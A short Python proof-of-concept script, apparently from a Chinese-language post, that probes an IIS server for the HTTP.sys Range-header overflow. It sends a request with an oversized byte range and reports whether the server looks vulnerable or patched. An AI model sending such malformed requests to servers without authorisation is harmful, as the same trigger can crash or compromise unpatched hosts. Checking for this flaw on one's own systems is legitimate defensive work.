1 import socket 2 import random 3 ipAddr = "10.1.89.20" 4 hexAllFfff = "18446744073709551615" 5 req1 = "GET / HTTP/1.0 " 6 req = "GET / HTTP/1.1 Host: stuff Range: bytes=0-" + hexAllFfff + " " 7 print("[*] Audit Started") 8 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 client_socket.connect((ipAddr, 80)) 10 client_socket.send(req1.encode()) 11 boringResp = client_socket.recv(1024).decode() 12 if "Microsoft" not in boringResp: 13 print("[*] Not IIS") 14 exit(0) 15 client_socket.close() 16 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 client_socket.connect((ipAddr, 80)) 18 client_socket.send(req.encode()) 19 goodResp = client_socket.recv(1024).decode() 20 if "Requested Range Not Satisfiable" in goodResp: 21 print("[!!] Looks VULN") 22 elif " The request has an invalid header name" in goodResp: 23 print("[*] Looks Patched") 24 else: 25 print("[*] Unexpected response, cannot discern patch status")
这个漏洞则这几天也火了一把,poc附上。